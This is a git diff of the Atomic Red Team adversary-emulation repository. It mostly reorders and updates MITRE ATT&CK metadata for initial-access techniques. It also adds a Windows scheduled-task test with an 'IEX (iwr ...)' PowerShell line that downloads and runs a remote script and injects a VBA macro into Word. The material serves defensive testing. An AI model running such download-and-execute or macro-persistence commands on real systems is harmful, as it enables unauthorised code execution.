+ a path to access the cloud APIs or to take advantage of weak identity and
+ access management policies.\n\nFor websites and databases, the OWASP top 10
+ and CWE top 25 highlight the most common web-based vulnerabilities.(Citation:
+ OWASP Top 10)(Citation: CWE top 25)"
external_references:
- source_name: mitre-attack
external_id: T1190
@@ -54998,6 +60721,14 @@ initial-access:
description: CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows
SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.
source_name: CIS Multiple SMB Vulnerabilities
+ - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018
+ url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors
+ Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
- url: https://nvd.nist.gov/vuln/detail/CVE-2014-7169
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
@@ -55011,25 +60742,26 @@ initial-access:
description: Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011,
September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved
April 10, 2019.
- description: |-
- Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
-
- If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
-
- For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
- name: Exploit Public-Facing Application
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-02-18T16:10:38.866Z'
+ modified: '2020-10-21T01:10:54.358Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '2.1'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - AWS
+ - GCP
+ - Azure
+ - Network
+ x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -55038,17 +60770,10 @@ initial-access:
- Web logs
- Web application firewall logs
- Application logs
- x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - AWS
- - GCP
- - Azure
+ x_mitre_version: '2.2'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1133:
technique:
@@ -55158,8 +60883,11 @@ initial-access:
March 2012), and others.'
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1200
external_id: T1200
+ url: https://attack.mitre.org/techniques/T1200
+ - external_id: CAPEC-440
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/440.html
- url: https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html
description: Michael Ossmann. (2011, February 17). Throwing Star LAN Tap.
Retrieved March 30, 2018.
@@ -55187,7 +60915,7 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-07-14T19:36:40.493Z'
+ modified: '2020-09-16T16:12:48.086Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -55201,7 +60929,7 @@ initial-access:
x_mitre_data_sources:
- Asset management
- Data loss prevention
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
atomic_tests: []
T1078.003:
technique:
@@ -55252,6 +60980,15 @@ initial-access:
atomic_tests: []
T1566:
technique:
+ id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.
+ name: Phishing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1566
@@ -55259,21 +60996,28 @@ initial-access:
- external_id: CAPEC-98
source_name: capec
url: https://capec.mitre.org/data/definitions/98.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Phishing
- description: |-
- Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
-
- Adversaries may send victim’s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.
- id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-28T00:04:46.427Z'
+ modified: '2020-10-18T01:55:03.337Z'
created: '2020-03-02T18:45:07.892Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - Office 365
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
+
+ Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
+
+ Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -55284,22 +61028,6 @@ initial-access:
- Detonation chamber
- SSL/TLS inspection
- Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
-
- Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
-
- Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - SaaS
- - Office 365
atomic_tests: []
T1091:
technique:
@@ -55362,7 +61090,7 @@ initial-access:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Spearphishing Attachment
description: |-
- Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
+ Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
id: attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
@@ -55370,9 +61098,9 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-27T23:56:40.369Z'
+ modified: '2020-10-18T01:52:25.316Z'
created: '2020-03-02T19:05:18.137Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
@@ -55458,33 +61186,26 @@ initial-access:
name: powershell
T1566.002:
technique:
- created: '2020-03-02T19:15:44.182Z'
- modified: '2020-03-02T19:44:47.843Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
description: "Adversaries may send spearphishing emails with a malicious link
- in an attempt to elicit sensitive information and/or gain access to victim
- systems. Spearphishing with a link is a specific variant of spearphishing.
- It is different from other forms of spearphishing in that it employs the use
- of links to download malware contained in email, instead of attaching malicious
- files to the email itself, to avoid defenses that may inspect email attachments.
- \n\nAll forms of spearphishing are electronically delivered social engineering
- targeted at a specific individual, company, or industry. In this case, the
- malicious emails contain links. Generally, the links will be accompanied by
- social engineering text and require the user to actively click or copy and
- paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204).
- The visited website may compromise the web browser using an exploit, or the
- user will be prompted to download applications, documents, zip files, or even
- executables depending on the pretext for the email in the first place. Adversaries
- may also include links that are intended to interact directly with an email
- reader, including embedded images intended to exploit the end system directly
- or verify the receipt of an email (i.e. web bugs/web beacons). Links may also
- direct users to malicious applications designed to [Steal Application Access
- Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in
- order to gain access to protected applications and information.(Citation:
+ in an attempt to gain access to victim systems. Spearphishing with a link
+ is a specific variant of spearphishing. It is different from other forms of
+ spearphishing in that it employs the use of links to download malware contained
+ in email, instead of attaching malicious files to the email itself, to avoid
+ defenses that may inspect email attachments. \n\nAll forms of spearphishing
+ are electronically delivered social engineering targeted at a specific individual,
+ company, or industry. In this case, the malicious emails contain links. Generally,
+ the links will be accompanied by social engineering text and require the user
+ to actively click or copy and paste a URL into a browser, leveraging [User
+ Execution](https://attack.mitre.org/techniques/T1204). The visited website
+ may compromise the web browser using an exploit, or the user will be prompted
+ to download applications, documents, zip files, or even executables depending
+ on the pretext for the email in the first place. Adversaries may also include
+ links that are intended to interact directly with an email reader, including
+ embedded images intended to exploit the end system directly or verify the
+ receipt of an email (i.e. web bugs/web beacons). Links may also direct users
+ to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s,
+ like OAuth tokens, in order to gain access to protected applications and information.(Citation:
Trend Micro Pawn Storm OAuth 2017)"
name: Spearphishing Link
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -55501,6 +61222,12 @@ initial-access:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-10-18T01:53:39.818Z'
+ created: '2020-03-02T19:15:44.182Z'
x_mitre_platforms:
- Linux
- macOS
@@ -55512,7 +61239,7 @@ initial-access:
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- Packet capture
- Web proxy
@@ -55541,39 +61268,38 @@ initial-access:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
- in an attempt to elicit sensitive information and/or gain access to victim
- systems. Spearphishing via service is a specific variant of spearphishing.
- It is different from other forms of spearphishing in that it employs the use
- of third party services rather than directly via enterprise email channels.
- \n\nAll forms of spearphishing are electronically delivered social engineering
- targeted at a specific individual, company, or industry. In this scenario,
- adversaries send messages through various social media services, personal
- webmail, and other non-enterprise controlled services. These services are
- more likely to have a less-strict security policy than an enterprise. As with
- most kinds of spearphishing, the goal is to generate rapport with the target
- or get the target's interest in some way. Adversaries will create fake social
- media accounts and message employees for potential job opportunities. Doing
- so allows a plausible reason for asking about services, policies, and software
- that's running in an environment. The adversary can then send malicious links
- or attachments through these services.\n\nA common example is to build rapport
- with a target via social media, then send content to a personal webmail service
- that the target uses on their work computer. This allows an adversary to bypass
- some email restrictions on the work account, and the target is more likely
- to open the file since it's something they were expecting. If the payload
- doesn't work as expected, the adversary can continue normal communications
- and troubleshoot with the target on how to get it working."
+ in an attempt to gain access to victim systems. Spearphishing via service
+ is a specific variant of spearphishing. It is different from other forms of
+ spearphishing in that it employs the use of third party services rather than
+ directly via enterprise email channels. \n\nAll forms of spearphishing are
+ electronically delivered social engineering targeted at a specific individual,
+ company, or industry. In this scenario, adversaries send messages through
+ various social media services, personal webmail, and other non-enterprise
+ controlled services. These services are more likely to have a less-strict
+ security policy than an enterprise. As with most kinds of spearphishing, the
+ goal is to generate rapport with the target or get the target's interest in
+ some way. Adversaries will create fake social media accounts and message employees
+ for potential job opportunities. Doing so allows a plausible reason for asking
+ about services, policies, and software that's running in an environment. The
+ adversary can then send malicious links or attachments through these services.\n\nA
+ common example is to build rapport with a target via social media, then send
+ content to a personal webmail service that the target uses on their work computer.
+ This allows an adversary to bypass some email restrictions on the work account,
+ and the target is more likely to open the file since it's something they were
+ expecting. If the payload doesn't work as expected, the adversary can continue
+ normal communications and troubleshoot with the target on how to get it working."
id: attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-28T00:04:46.264Z'
+ modified: '2020-10-18T01:55:02.988Z'
created: '2020-03-02T19:24:00.951Z'
x_mitre_data_sources:
- SSL/TLS inspection
- Anti-virus
- Web proxy
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_detection: "Because most common third-party services used for spearphishing
via service leverage TLS encryption, SSL/TLS inspection is generally required
@@ -55592,8 +61318,30 @@ initial-access:
atomic_tests: []
T1195:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Supply Chain Compromise
+ description: "Adversaries may manipulate products or product delivery mechanisms
+ prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
+ chain compromise can take place at any stage of the supply chain including:\n\n*
+ Manipulation of development tools\n* Manipulation of a development environment\n*
+ Manipulation of source code repositories (public or private)\n* Manipulation
+ of source code in open-source dependencies\n* Manipulation of software update/distribution
+ mechanisms\n* Compromised/infected system images (multiple cases of removable
+ media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider
+ Electric USB Malware) \n* Replacement of legitimate software with modified
+ versions\n* Sales of modified/counterfeit products to legitimate distributors\n*
+ Shipment interdiction\n\nWhile supply chain compromise can impact any component
+ of hardware or software, attackers looking to gain execution have often focused
+ on malicious additions to legitimate software in software distribution or
+ update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil
+ 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired
+ victim set (Citation: Symantec Elderwood Sept 2012) or malicious software
+ may be distributed to a broad set of consumers but only move on to additional
+ tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command
+ Five SK 2011) Popular open source projects that are used as dependencies in
+ many applications may also be targeted as a means to add malicious code to
+ users of the dependency. (Citation: Trendmicro NPM Compromise)"
external_references:
- source_name: mitre-attack
external_id: T1195
@@ -55612,7 +61360,7 @@ initial-access:
description: IBM Support. (2017, April 26). Storwize USB Initialization Tool
may contain malicious code. Retrieved May 28, 2019.
- source_name: Schneider Electric USB Malware
- url: https://www.schneider-electric.com/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
@@ -55638,52 +61386,30 @@ initial-access:
url: https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
- description: "Adversaries may manipulate products or product delivery mechanisms
- prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
- chain compromise can take place at any stage of the supply chain including:\n\n*
- Manipulation of development tools\n* Manipulation of a development environment\n*
- Manipulation of source code repositories (public or private)\n* Manipulation
- of source code in open-source dependencies\n* Manipulation of software update/distribution
- mechanisms\n* Compromised/infected system images (multiple cases of removable
- media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider
- Electric USB Malware) \n* Replacement of legitimate software with modified
- versions\n* Sales of modified/counterfeit products to legitimate distributors\n*
- Shipment interdiction\n\nWhile supply chain compromise can impact any component
- of hardware or software, attackers looking to gain execution have often focused
- on malicious additions to legitimate software in software distribution or
- update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil
- 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired
- victim set (Citation: Symantec Elderwood Sept 2012) or malicious software
- may be distributed to a broad set of consumers but only move on to additional
- tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command
- Five SK 2011) Popular open source projects that are used as dependencies in
- many applications may also be targeted as a means to add malicious code to
- users of the dependency. (Citation: Trendmicro NPM Compromise)"
- name: Supply Chain Compromise
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T12:51:45.574Z'
+ modified: '2020-10-13T12:38:32.426Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Web proxy
- - File monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Veeral Patel
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
x_mitre_detection: Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. Perform physical inspection of hardware
to look for potential tampering.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_contributors:
- - Veeral Patel
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Web proxy
+ - File monitoring
+ x_mitre_version: '1.2'
atomic_tests: []
T1199:
technique:
@@ -55736,13 +61462,8 @@ initial-access:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -55758,8 +61479,13 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -55770,13 +61496,31 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -55787,27 +61531,9 @@ initial-access:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 4a10e2cb..eff14164 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -2,9 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
-Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
-
-Within IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)
+Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
## Atomic Tests
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 73433250..85e5a7d6 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -16,6 +16,8 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
- [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task)
+- [Atomic Test #5 - Task Scheduler via VBA](#atomic-test-5---task-scheduler-via-vba)
+
@@ -155,4 +157,52 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
+
+
+
+## Atomic Test #5 - Task Scheduler via VBA
+This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+30 - 40 seconds after this module has run
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
